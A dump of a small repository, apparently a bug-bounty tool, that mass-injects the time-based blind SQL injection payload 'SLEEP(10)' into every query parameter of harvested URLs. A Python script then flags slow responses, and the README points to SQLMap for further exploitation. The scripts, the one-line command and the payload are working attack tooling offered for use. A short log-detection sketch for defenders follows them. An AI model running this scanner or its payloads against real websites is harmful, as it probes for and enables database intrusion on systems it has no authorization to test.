├── Automate.sh
├── README.md
├── Response_Time_Checker.py
└── command.txt


/Automate.sh:
--------------------------------------------------------------------------------
#!/bin/bash

# Run the command to inject the payload into the URLs and save the output to a file
cat urls.txt | grep "=" | qsreplace "1 AND (SELECT 5230 FROM (SELECT(SLEEP(10)))SUmc)" > blindsqli.txt

# Run the response time checker script on the generated file
# (file name matches the repository tree; it is case-sensitive on Linux)
python3 Response_Time_Checker.py -l blindsqli.txt -rt 10

--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# SQLi-Automation

This script helps you to automate your SQLi recon process!! I got this idea by seeing a tweet on Twitter regarding the same, but that doesn't work as intended. So I decided to make my own!! And share with other folks! The script works this way:
1. It first selects every URL in urls.txt (from waybackurls etc.) that contains "=".
2. It then replaces each query-string value with an SQLi payload.


# Installation Instructions:
1. git clone https://github.com/0x2458bughunt/SQLi-Automation
2. cd SQLi-Automation
3. chmod +x Automate.sh
4. ./Automate.sh

OR
1. git clone https://github.com/0x2458bughunt/SQLi-Automation
2. cd SQLi-Automation
3. cat command.txt - copy the command.
4. After copying, run it in the directory where your urls.txt is.
5. Then run Response_Time_Checker.py against the new file, which has the SQLi payloads.


# Note:
~# You can change the SQLi payload according to your interest!
~# Make sure to give "-rt" a value greater than or equal to the time delay you provided in your payload. This will avoid false positives.
~# After it detects the time delay, make sure to exploit it manually or use Ghauri (https://github.com/r0oth3x49/ghauri) or SQLMap to confirm the vulnerability.
~# You'll need the qsreplace tool by tomnomnom installed. You can install it from here: https://github.com/tomnomnom/qsreplace


# Socials:
Twitter: https://twitter.com/0x2458/
BuyMeACoffee: https://buymeacoffee.com/0x2458/

Feel free to contribute! And do give it a star if you like the tool! Good luck!
~0x2458

--------------------------------------------------------------------------------
/Response_Time_Checker.py:
--------------------------------------------------------------------------------
import argparse
import requests
from colorama import Fore, Style

def measure_response_time(urls_file, min_response_time):
    try:
        with open(urls_file, 'r') as file:
            # Skip blank lines so they are not requested as empty URLs
            urls = [line.strip() for line in file if line.strip()]

        for url in urls:
            try:
                response = requests.get(url)
                # elapsed covers the time from sending the request until the response headers are parsed
                response_time = response.elapsed.total_seconds()

                if response_time >= min_response_time:
                    # Print URL and response time
                    print(f"URL: {url} | Response Time: ", end='')

                    # Print response time in green color
                    print(Fore.GREEN + f"{response_time:.2f} seconds" + Style.RESET_ALL)
            except requests.exceptions.RequestException as e:
                print(f"Error occurred while accessing the URL: {url} - {e}")
    except FileNotFoundError:
        print(f"URLs file '{urls_file}' not found.")

# Create command-line argument parser
parser = argparse.ArgumentParser(description='Measure response time of URLs')
parser.add_argument('-l', '--urls-file', help='File containing URLs')
parser.add_argument('-rt', '--min-response-time', type=float, default=0,
                    help='Minimum response time threshold in seconds (default: 0)')

# Parse the command-line arguments
args = parser.parse_args()

# Get the URLs file and minimum response time threshold from the arguments
urls_file = args.urls_file
min_response_time = args.min_response_time

if not urls_file:
    print('No URLs file provided.')
    exit()

measure_response_time(urls_file, min_response_time)

--------------------------------------------------------------------------------
/command.txt:
--------------------------------------------------------------------------------
cat urls.txt | grep "=" | qsreplace "1 AND (SELECT 5230 FROM (SELECT(SLEEP(10)))SUmc)" > blindsqli.txt

--------------------------------------------------------------------------------
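
Seen from the receiving side, the probe above leaves a recognizable trace in web server access logs: query-string values that decode to a database delay call such as `SLEEP(10)`. The following detection sketch is an added example, not part of the repository; the log lines are constructed, and the function names, the combined-log-format assumption and the list of delay functions beyond `SLEEP` are assumptions of this example.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

# Delay primitives seen in time-based blind SQLi probes. SLEEP is the one in
# this page's payload; the others are an assumed list of common equivalents.
DELAY_CALL = re.compile(
    r"\b(?:sleep|benchmark|pg_sleep)\s*\(|\bwaitfor\s+delay\b", re.IGNORECASE)

# Combined log format prefix: client IP, identity, user, [time], "METHOD target HTTP/x"
LOG_LINE = re.compile(
    r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def delay_params(target):
    """Return the query parameter names whose decoded value holds a delay call."""
    query = urlsplit(target).query
    # parse_qsl percent-decodes values and turns '+' back into a space,
    # so the pattern is matched against what the application would see.
    return [name for name, value in parse_qsl(query, keep_blank_values=True)
            if DELAY_CALL.search(value)]

def scan(lines):
    """Map client IP -> list of (request target, flagged parameter names)."""
    hits = defaultdict(list)
    for line in lines:
        match = LOG_LINE.match(line)
        if not match:
            continue  # not a request line in the expected format
        ip, target = match.groups()
        flagged = delay_params(target)
        if flagged:
            hits[ip].append((target, flagged))
    return dict(hits)

# Constructed sample log lines (documentation IP ranges, made-up paths).
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /item.php?id=1+AND+%28SELECT+5230+FROM+%28SELECT%28SLEEP%2810%29%29%29SUmc%29 HTTP/1.1" 200 512',
    '203.0.113.7 - - [10/Oct/2023:13:55:47 +0000] "GET /list.php?cat=1+AND+%28SELECT+5230+FROM+%28SELECT%28SLEEP%2810%29%29%29SUmc%29&sort=1+AND+%28SELECT+5230+FROM+%28SELECT%28SLEEP%2810%29%29%29SUmc%29 HTTP/1.1" 200 498',
    '198.51.100.23 - - [10/Oct/2023:13:56:02 +0000] "GET /blog?title=how+to+sleep+better HTTP/1.1" 200 2048',
    '198.51.100.23 - - [10/Oct/2023:13:56:05 +0000] "GET /search?q=shoes&page=2 HTTP/1.1" 200 1024',
]

if __name__ == "__main__":
    for ip, requests_seen in scan(SAMPLE_LOG).items():
        for target, names in requests_seen:
            print(f"{ip} delay call in {names}: {target}")
```

A match shows that a probe was sent, not that the parameter is injectable, and a changed payload or a POST body will not appear in this view; parameterized queries in the application remain the actual fix.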